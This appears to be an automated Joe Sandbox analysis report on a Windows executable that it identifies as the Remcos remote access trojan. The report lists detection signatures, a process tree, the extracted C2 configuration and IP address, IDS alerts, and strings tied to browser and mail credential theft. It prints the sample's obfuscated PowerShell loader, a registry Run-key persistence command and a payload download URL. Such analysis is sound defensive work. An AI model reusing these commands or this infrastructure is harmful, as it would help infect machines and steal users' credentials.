Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Priority_Quote_Request_Items_List.exe

Overview

General Information

Sample name:Priority_Quote_Request_Items_List.exe
Analysis ID:1535971
MD5:71a5c22358684ea0359d9e20c12cbfd0
SHA1:904946890793b72889b04a8d85d7427cbb374ede
SHA256:9d64923557fd189c8f045db5f7ebdf23ca6afe0ed48d4b5a9f9398548ef848f8
Tags:exeuser-lowmal3
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Detected unpacking (changes PE section rights)
Early bird code injection technique detected
Found malware configuration
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Powershell drops PE file
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry

Classification

  • System is w10x64
  • Priority_Quote_Request_Items_List.exe (PID: 6748 cmdline: "C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe" MD5: 71A5C22358684EA0359D9E20C12CBFD0)
    • powershell.exe (PID: 2688 cmdline: "powershell.exe" -windowstyle minimized "$Ketonizes=Get-Content -Raw 'C:\Users\user\AppData\Roaming\thrombopenia\Udansk.man';$Stomapod=$Ketonizes.SubString(11239,3);.$Stomapod($Ketonizes)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • lftebevgelserne.exe (PID: 5744 cmdline: "C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe" MD5: 71A5C22358684EA0359D9E20C12CBFD0)
        • cmd.exe (PID: 5760 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Wende% -windowstyle 1 $Pertline=(gp -Path 'HKCU:\Software\Platanus\').Grundtankerne;%Wende% ($Pertline)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 1748 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Wende% -windowstyle 1 $Pertline=(gp -Path 'HKCU:\Software\Platanus\').Grundtankerne;%Wende% ($Pertline)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • lftebevgelserne.exe (PID: 2824 cmdline: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe /stext "C:\Users\user\AppData\Local\Temp\lmkhnkgtxjjxcrnotizi" MD5: 71A5C22358684EA0359D9E20C12CBFD0)
        • lftebevgelserne.exe (PID: 4468 cmdline: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe /stext "C:\Users\user\AppData\Local\Temp\ngpzfdrvkrbkmxjsctukugj" MD5: 71A5C22358684EA0359D9E20C12CBFD0)
        • lftebevgelserne.exe (PID: 4524 cmdline: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe /stext "C:\Users\user\AppData\Local\Temp\xivkgncoyztpolxwtdgdfsekyz" MD5: 71A5C22358684EA0359D9E20C12CBFD0)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["185.150.191.117:4609:1"], "Assigned name": "chika dibia", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-QGLBE0", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
00000005.00000002.3960470900.000000000287A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000005.00000002.3960470900.0000000002858000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000005.00000002.3960470900.0000000002867000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        Process Memory Space: lftebevgelserne.exe PID: 5744JoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
          Process Memory Space: lftebevgelserne.exe PID: 5744JoeSecurity_RemcosYara detected Remcos RATJoe Security
            Click to see the 1 entries

            System Summary

            barindex
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Wende% -windowstyle 1 $Pertline=(gp -Path 'HKCU:\Software\Platanus\').Grundtankerne;%Wende% ($Pertline), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 1748, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key
            Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Wende% -windowstyle 1 $Pertline=(gp -Path 'HKCU:\Software\Platanus\').Grundtankerne;%Wende% ($Pertline)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Wende% -windowstyle 1 $Pertline=(gp -Path 'HKCU:\Software\Platanus\').Grundtankerne;%Wende% ($Pertline)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Wende% -windowstyle 1 $Pertline=(gp -Path 'HKCU:\Software\Platanus\').Grundtankerne;%Wende% ($Pertline)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5760, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Wende% -windowstyle 1 $Pertline=(gp -Path 'HKCU:\Software\Platanus\').Grundtankerne;%Wende% ($Pertline)", ProcessId: 1748, ProcessName: reg.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Wende% -windowstyle 1 $Pertline=(gp -Path 'HKCU:\Software\Platanus\').Grundtankerne;%Wende% ($Pertline)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Wende% -windowstyle 1 $Pertline=(gp -Path 'HKCU:\Software\Platanus\').Grundtankerne;%Wende% ($Pertline)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe", ParentImage: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe, ParentProcessId: 5744, ParentProcessName: lftebevgelserne.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Wende% -windowstyle 1 $Pertline=(gp -Path 'HKCU:\Software\Platanus\').Grundtankerne;%Wende% ($Pertline)", ProcessId: 5760, ProcessName: cmd.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$Ketonizes=Get-Content -Raw 'C:\Users\user\AppData\Roaming\thrombopenia\Udansk.man';$Stomapod=$Ketonizes.SubString(11239,3);.$Stomapod($Ketonizes)" , CommandLine: "powershell.exe" -windowstyle minimized "$Ketonizes=Get-Content -Raw 'C:\Users\user\AppData\Roaming\thrombopenia\Udansk.man';$Stomapod=$Ketonizes.SubString(11239,3);.$Stomapod($Ketonizes)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe", ParentImage: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe, ParentProcessId: 6748, ParentProcessName: Priority_Quote_Request_Items_List.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Ketonizes=Get-Content -Raw 'C:\Users\user\AppData\Roaming\thrombopenia\Udansk.man';$Stomapod=$Ketonizes.SubString(11239,3);.$Stomapod($Ketonizes)" , ProcessId: 2688, ProcessName: powershell.exe

            Stealing of Sensitive Information

            barindex
            Source: Registry Key setAuthor: Joe Security: Data: Details: 5A 3A 74 77 6D D7 AC 84 79 E5 93 38 1E BA 21 26 CA F4 8E 21 53 72 B4 87 72 A0 FF E2 C0 AD 5C C2 6F 6A 74 03 C4 D7 61 EB EB 55 7B 8C 1E 77 FA B3 11 80 B3 B4 47 76 0C 14 0E 9E 1C C5 E4 BE F6 FB A8 19 D7 A8 F7 BE 36 62 6E 48 C8 9F E9 1F 86 8D 96 D0 CF 56 0D AF DF F6 4C 80 3F 4C 00 BE 7D 32 D1 77 68 04 16 4A C4 9B 0B 4D CB 4B 58 E5 , EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe, ProcessId: 5744, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-QGLBE0\exepath
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-17T14:32:31.913370+020020229301A Network Trojan was detected172.202.163.200443192.168.2.849706TCP
            2024-10-17T14:32:51.751300+020020229301A Network Trojan was detected4.245.163.56443192.168.2.858044TCP
            2024-10-17T14:32:54.019722+020020229301A Network Trojan was detected4.245.163.56443192.168.2.858045TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-17T14:33:02.583961+020020365941Malware Command and Control Activity Detected192.168.2.858047185.150.191.1174609TCP
            2024-10-17T14:33:03.626233+020020365941Malware Command and Control Activity Detected192.168.2.858048185.150.191.1174609TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-17T14:33:03.780099+020028033043Unknown Traffic192.168.2.858049178.237.33.5080TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000005.00000002.3960470900.0000000002858000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["185.150.191.117:4609:1"], "Assigned name": "chika dibia", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-QGLBE0", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
            Source: Yara matchFile source: 00000005.00000002.3960470900.000000000287A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3960470900.0000000002858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3960470900.0000000002867000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: lftebevgelserne.exe PID: 5744, type: MEMORYSTR
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,12_2_00404423
            Source: Priority_Quote_Request_Items_List.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: Priority_Quote_Request_Items_List.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeCode function: 0_2_0040635D FindFirstFileW,FindClose,0_2_0040635D
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeCode function: 0_2_0040580B GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040580B
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 5_2_0040635D FindFirstFileW,FindClose,5_2_0040635D
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 5_2_0040580B GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_0040580B
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 5_2_004027FB FindFirstFileW,5_2_004027FB
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 5_2_1F2310F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_1F2310F1
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 5_2_1F236580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,5_2_1F236580
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_0040AE51 FindFirstFileW,FindNextFileW,12_2_0040AE51
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 13_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407EF8
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407898

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.8:58047 -> 185.150.191.117:4609
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.8:58048 -> 185.150.191.117:4609
            Source: Malware configuration extractorIPs: 185.150.191.117
            Source: global trafficTCP traffic: 192.168.2.8:58047 -> 185.150.191.117:4609
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
            Source: Joe Sandbox ViewASN Name: RELIABLESITEUS RELIABLESITEUS
            Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:58049 -> 178.237.33.50:80
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.8:58045
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.8:49706
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.8:58044
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: global trafficHTTP traffic detected: GET /diddyishere/YyHolEVWoHsYmSFIbeB57.bin HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 103.72.57.120Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: lftebevgelserne.exe, 0000000C.00000003.2040286769.0000000000A49000.00000004.00000020.00020000.00000000.sdmp, lftebevgelserne.exe, 0000000C.00000002.2041614154.0000000000A49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
            Source: lftebevgelserne.exe, 0000000C.00000003.2040286769.0000000000A49000.00000004.00000020.00020000.00000000.sdmp, lftebevgelserne.exe, 0000000C.00000002.2041614154.0000000000A49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
            Source: lftebevgelserne.exe, 00000005.00000002.3974075181.000000001F200000.00000040.10000000.00040000.00000000.sdmp, lftebevgelserne.exe, 0000000E.00000002.2019884187.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
            Source: lftebevgelserne.exe, lftebevgelserne.exe, 0000000E.00000002.2019884187.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
            Source: lftebevgelserne.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
            Source: lftebevgelserne.exe, 00000005.00000002.3973779760.000000001F110000.00000040.10000000.00040000.00000000.sdmp, lftebevgelserne.exe, 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
            Source: lftebevgelserne.exe, 00000005.00000002.3973779760.000000001F110000.00000040.10000000.00040000.00000000.sdmp, lftebevgelserne.exe, 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
            Source: global trafficDNS traffic detected: DNS query: geoplugin.net
            Source: lftebevgelserne.exe, 00000005.00000002.3960470900.0000000002838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.72.57.120/diddyishere/YyHolEVWoHsYmSFIbeB57.bin
            Source: lftebevgelserne.exe, 00000005.00000002.3960470900.0000000002838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.72.57.120/diddyishere/YyHolEVWoHsYmSFIbeB57.binl
            Source: bhv8781.tmp.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
            Source: bhv8781.tmp.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
            Source: bhv8781.tmp.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
            Source: bhv8781.tmp.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
            Source: bhv8781.tmp.12.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
            Source: lftebevgelserne.exe, 00000005.00000002.3960470900.0000000002858000.00000004.00000020.00020000.00000000.sdmp, lftebevgelserne.exe, 00000005.00000002.3960470900.0000000002838000.00000004.00000020.00020000.00000000.sdmp, lftebevgelserne.exe, 00000005.00000002.3960470900.0000000002867000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
            Source: lftebevgelserne.exe, 00000005.00000002.3960470900.0000000002858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp8
            Source: lftebevgelserne.exe, 00000005.00000002.3960470900.0000000002858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpC
            Source: lftebevgelserne.exe, 00000005.00000002.3960470900.0000000002867000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpL
            Source: lftebevgelserne.exe, 00000005.00000002.3960470900.0000000002867000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpU
            Source: lftebevgelserne.exe, 00000005.00000002.3960470900.0000000002858000.00000004.00000020.00020000.00000000.sdmp, lftebevgelserne.exe, 00000005.00000002.3960470900.0000000002867000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
            Source: lftebevgelserne.exe, 00000005.00000002.3960470900.0000000002838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpq
            Source: Priority_Quote_Request_Items_List.exe, lftebevgelserne.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: bhv8781.tmp.12.drString found in binary or memory: http://ocsp.digicert.com0
            Source: lftebevgelserne.exe, lftebevgelserne.exe, 0000000E.00000002.2019884187.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
